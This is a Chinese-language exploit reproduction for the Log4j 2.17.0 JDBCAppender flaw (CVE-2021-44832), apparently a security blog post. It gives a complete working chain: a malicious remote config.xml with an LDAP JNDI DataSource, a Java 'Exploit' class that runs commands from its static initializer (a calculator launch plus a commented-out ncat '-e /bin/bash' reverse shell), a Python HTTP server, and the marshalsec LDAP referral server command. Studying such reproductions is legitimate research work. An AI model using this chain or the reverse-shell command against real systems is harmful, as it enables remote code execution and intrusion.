0x00 漏洞复现
还是使用Github上大佬的环境
然后需要改一些配置文件,然后还有一个远程的config.xml
首先是新建一个远程的的config.xml
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="error">
<Appenders>
<JDBC name="databaseAppender" tableName="dbo.application_log">
<DataSource jndiName="ldap://127.0.0.1:1389/Exploit" />
<Column name="eventDate" isEventTimestamp="true" />
<Column name="level" pattern="%level" />
<Column name="logger" pattern="%logger" />
<Column name="message" pattern="%message" />
<Column name="exception" pattern="%ex{full}" />
</JDBC>
</Appenders>
<Loggers>
<Root level="warn">
<AppenderRef ref="databaseAppender"/>
</Root>
</Loggers>
</Configuration>
随后需要一个恶意类
public class Exploit{
static{
System.err.println("Pwned");
try{
// String[] cmd = {"ncat", "-e", "/bin/bash", "", "1234"};
String[] cmd = {"open", "-a", "/System/Applications/Calculator.app"};
java.lang.Runtime.getRuntime().exec(cmd).waitFor();
}catch(Exception e){
e.printStackTrace();
}
}
然后Java编译成class,现在就可以在config和这个恶意类同目录下开启简单的Python http服务
python3 -m http.server
随后需要修改一下代码,如下
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import java.util.*;
public class log4j {
public static void main(String[] args) {
System.setProperty("log4j2.configurationFile", "http://127.0.0.1:8888/config.xml");
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
final Logger logger = LogManager.getLogger(log4j.class);
Scanner sc = new Scanner(System.in);
String str;
while(true){
str = sc.nextLine();
logger.error(str);
}
}
}
然后开启marshalsec
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"
随后直接运行即可
0x01 参考与原理
1、https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/
